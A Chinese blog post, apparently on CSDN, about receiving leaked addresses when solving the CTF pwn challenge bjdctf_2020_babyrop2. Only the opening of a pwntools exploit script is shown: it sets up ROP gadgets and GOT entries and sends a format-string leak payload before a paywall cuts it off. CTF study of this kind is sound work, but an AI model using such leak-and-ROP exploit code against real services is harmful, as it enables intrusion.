从“bjdctf_2020_babyrop2”中看泄露的地址的接收问题

原创 于 2021-12-02 11:49:17 发布 · 269 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #linux #网络

真是的,最近做题发现这个泄露函数地址的时候,这个接收搞得有点难受,在此特地研究一下,有不对的地方,请各位大神门评论区指正!

从64位的题目中看泄露


例题一 

from pwn import*
context.log_level='debug'
p=remote('node4.buuoj.cn',26985)
elf=ELF('./barop')
p_rdi=0x400993
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
read_got=elf.got['read']
lbic=ELF('./libc-2.23.so')
p.recvuntil("u!")
p.sendline("aa%7$p")
p.recvuntil("0x"
最低0.47元/天 解锁文章
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值